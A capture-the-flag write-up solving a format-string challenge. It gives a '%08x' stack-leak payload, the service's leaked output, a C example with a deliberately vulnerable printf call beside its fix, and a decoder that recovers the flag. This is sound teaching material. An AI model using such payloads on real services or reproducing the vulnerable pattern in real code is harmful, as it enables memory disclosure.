Rating:

Problem:
My first service I(pwn, 100 points)

"Blacky is taking his first steps at C programming for embedded systems, but he makes some mistakes. Retrieve the secret key for access."

nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000

Solution:

When we netcat into the service (there isn't much else to do, since we don't have the binary), we can try the usual attack types. Sending a long input to overflow the buffer doesn't lead anywhere though (we just get a segfault), and without the binary there is nothing to build an overflow exploit around, so a buffer overflow is very unlikely to be the intended vulnerability.

The next thing to try (especially since the description implies the programmer is new) is a format string bug. Mistakes like printf(variable) are very common; I've even seen tutorials teach it! It may not seem like a big deal at first glance, but the correct form is printf("%s", variable) (assuming "variable" is a string). Why is the first form so bad? printf treats our input as the format string, so we can inject our own format specifiers and leak memory.
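To make the difference concrete, here is an added example (my own reconstruction, not the challenge's source, which we never had): a hypothetical reply routine written the buggy way next to the fixed way. Both write into a buffer instead of stdout so the results can be compared; the function names and the "Invalid key: " prefix are assumptions based on the service's output.

```c
#include <stdio.h>
#include <string.h>

/* Shared output buffer so the two variants can be compared side by side. */
char reply_buf[256];

/* Hypothetical reconstruction of the service's reply path (the real source
 * was not available). The bug: the user's key becomes the format string. */
int reply_vulnerable(char *out, size_t outn, const char *key) {
    int len = snprintf(out, outn, "Invalid key: ");
    if (len < 0 || (size_t)len >= outn) return -1;
    /* BUG: `key` is the format string. Every %x in it makes printf read a
     * 32-bit argument the caller never passed, i.e. whatever happens to be
     * in the next argument register or stack slot. Compilers warn about
     * exactly this pattern (-Wformat-security). */
    int r = snprintf(out + len, outn - (size_t)len, key);
    return r < 0 ? -1 : len + r;
}

/* Fixed form: a literal format string, user data passed as an argument.
 * A key of "AAAA%08x" is now copied verbatim; nothing is interpreted. */
int reply_fixed(char *out, size_t outn, const char *key) {
    return snprintf(out, outn, "Invalid key: %s", key);
}

int main(void) {
    const char *probe = "AAAA%08x.%08x.%08x.%08x";
    reply_vulnerable(reply_buf, sizeof reply_buf, probe);
    printf("vulnerable: %s\n", reply_buf); /* four leaked 32-bit words */
    reply_fixed(reply_buf, sizeof reply_buf, probe);
    printf("fixed:      %s\n", reply_buf); /* the probe echoed unchanged */
    return 0;
}
```

With the vulnerable variant, "AAAA%08x" comes back as "AAAA" followed by eight hex digits of whatever was in the first unused argument slot; with the fixed variant it comes back exactly as sent, which is the behaviour the service should have had.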

A helpful specifier in our case is %08x: each one consumes the next 32-bit argument printf thinks it was given, which, once the real arguments run out, is simply the next 4-byte word on the stack, printed as 8 hex digits. So if we keep inserting them, we leak successive words of the stack, one word per specifier. If the flag is sitting in there, we have it. Sure enough, it is.

If we use "AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x" as our input, we get the following on stdout:

Invalid key: AAAA00000000.0000000a.00000000.00000000.00000000.0000000a.00000000.454b4f7b.4c614269.67426566.3072647d.00000000.41414141.25303878.2e253038.782e2530

Words 8 through 11, "454b4f7b4c614269674265663072647d", decode from hex to the ASCII string "EKO{LaBigBef0rd}". Note that the words come out in memory order here: word 13 is 41414141 (our own AAAA) and word 14 is 25303878, which is "%08x" read left to right, so this target prints each word as it sits in memory. On a little-endian target such as x86, each 4-byte word would come out reversed ("{OKE" for the first flag word) and you would byte-swap every word before reading it. The AAAA landing in word 13 also tells us that our input buffer is the 13th format argument.
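Rather than pasting the leak into a hex editor, the conversion can be scripted. The following is an added example, not part of the original writeup: it parses the service's reply quoted above (embedded here as a constructed copy), turns each 8-hex-digit word back into bytes in either byte order, searches for a flag of the form prefix...}, and reports which word holds the AAAA marker. The function names and the generic prefix parameter are my own choices; the little-endian sample reply is constructed by byte-swapping the real one to show the endianness caveat.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed copy of the service's reply quoted in the writeup (words print
 * in memory order, so the flag reads straight off). */
const char LEAK_BE[] =
    "Invalid key: AAAA00000000.0000000a.00000000.00000000.00000000."
    "0000000a.00000000.454b4f7b.4c614269.67426566.3072647d.00000000."
    "41414141.25303878.2e253038.782e2530";

/* Constructed reply as a little-endian (x86-style) target would print the
 * same flag: every 32-bit word appears byte-reversed. */
const char LEAK_LE[] =
    "Invalid key: AAAA00000000.7b4f4b45.6942614c.66654267.7d647230.41414141";

/* Parse the dot-separated 8-hex-digit words after the echoed "AAAA" marker
 * into raw bytes. Each %08x printed one 32-bit word as a number; on a
 * little-endian target the four bytes must be reversed to get memory order.
 * Returns the byte count, or -1 on a parse error. */
int leak_to_bytes(const char *leak, int little_endian,
                  unsigned char *buf, size_t bufn) {
    const char *p = strstr(leak, "AAAA");
    if (!p) return -1;
    p += 4;
    size_t n = 0;
    while (*p) {
        char word[9];
        size_t i;
        for (i = 0; i < 8 && isxdigit((unsigned char)p[i]); i++) word[i] = p[i];
        if (i != 8 || n + 4 > bufn) return -1;
        word[8] = '\0';
        unsigned long v = strtoul(word, NULL, 16);
        for (i = 0; i < 4; i++) {
            /* i == 0 is the most significant byte as printed */
            unsigned char b = (unsigned char)(v >> (8 * (3 - i)));
            buf[n + (little_endian ? 3 - i : i)] = b;
        }
        n += 4;
        p += 8;
        if (*p != '.') break;  /* end of the word list (or trailing newline) */
        p++;
    }
    return (int)n;
}

/* 1-based index of the word equal to marker_hex, i.e. the printf argument
 * number that reads the input buffer, or 0 if absent. */
int marker_position(const char *leak, const char *marker_hex) {
    const char *p = strstr(leak, "AAAA");
    if (!p) return 0;
    p += 4;
    for (int idx = 1; strlen(p) >= 8; idx++) {
        if (strncmp(p, marker_hex, 8) == 0) return idx;
        p += 8;
        if (*p != '.') break;
        p++;
    }
    return 0;
}

/* Decode the leak and look for prefix followed by printable bytes and '}'.
 * Returns a pointer to a static buffer holding the flag, or NULL. */
const char *recover_flag(const char *leak, int little_endian, const char *prefix) {
    static char flag[128];
    unsigned char bytes[512];
    int n = leak_to_bytes(leak, little_endian, bytes, sizeof bytes);
    if (n < 0) return NULL;
    size_t plen = strlen(prefix);
    for (size_t i = 0; i + plen <= (size_t)n; i++) {
        if (memcmp(bytes + i, prefix, plen) != 0) continue;
        size_t j = i + plen;
        while (j < (size_t)n && bytes[j] != '}' && isprint(bytes[j])) j++;
        if (j < (size_t)n && bytes[j] == '}' && j - i + 1 < sizeof flag) {
            memcpy(flag, bytes + i, j - i + 1);
            flag[j - i + 1] = '\0';
            return flag;
        }
    }
    return NULL;
}

int main(void) {
    const char *f = recover_flag(LEAK_BE, 0, "EKO{");
    printf("big-endian read:    %s (AAAA is word %d)\n",
           f ? f : "(none)", marker_position(LEAK_BE, "41414141"));
    f = recover_flag(LEAK_BE, 1, "EKO{");
    printf("wrong byte order:   %s\n", f ? f : "(none)");
    f = recover_flag(LEAK_LE, 1, "EKO{");
    printf("little-endian read: %s\n", f ? f : "(none)");
    return 0;
}
```

Reading the real reply with little_endian set to 1 finds nothing, because the words become "{OKE", "iBaL", and so on; that is the symptom to look for when a leak looks like garbage on an x86 target. The marker position (13 here) is also what you would plug into a direct-parameter specifier such as %13$x to read that one word without the twelve leading ones.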

Flag: EKO{LaBigBef0rd}

Original writeup (http://specterdev.blogspot.ca/).